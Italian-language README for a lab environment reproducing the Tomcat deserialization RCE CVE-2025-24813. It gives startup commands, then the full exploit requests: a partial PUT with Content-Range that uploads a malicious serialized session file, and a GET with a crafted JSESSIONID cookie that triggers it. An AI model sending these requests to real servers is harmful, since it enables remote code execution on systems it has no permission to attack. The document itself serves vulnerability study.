
tomcat CVE-2025-24813 ambiente di deserializzazione RCE
Questo repository fornisce l'ambiente per la riproduzione della recente RCE CVE-2025-24813 su Tomcat.
Solo per scopi di studio e ricerca!
Questo ambiente ha già attivato le condizioni necessarie per la riproduzione sopra elencate
Linux:
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
Windows:
apache-tomcat-9.0.98/bin/catalina.bat run
Visitare: http://127.0.0.1:9001/
Generare un file serializzato malevolo e caricarlo utilizzando il seguente pacchetto. Assicurarsi che il valore del chunk in Range corrisponda a Length e sia maggiore della lunghezza corrente del file.
PUT /xxxxx/session HTTP/1.1
Host: 192.168.131.32:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{contenuto del file serializzato}}}
Utilizzare il seguente POC per attivare:
GET / HTTP/1.1
Host: 192.168.131.32:8080
Cookie: JSESSIONID=.xxxxx
Riferimento: https://forum.butian.net/article/674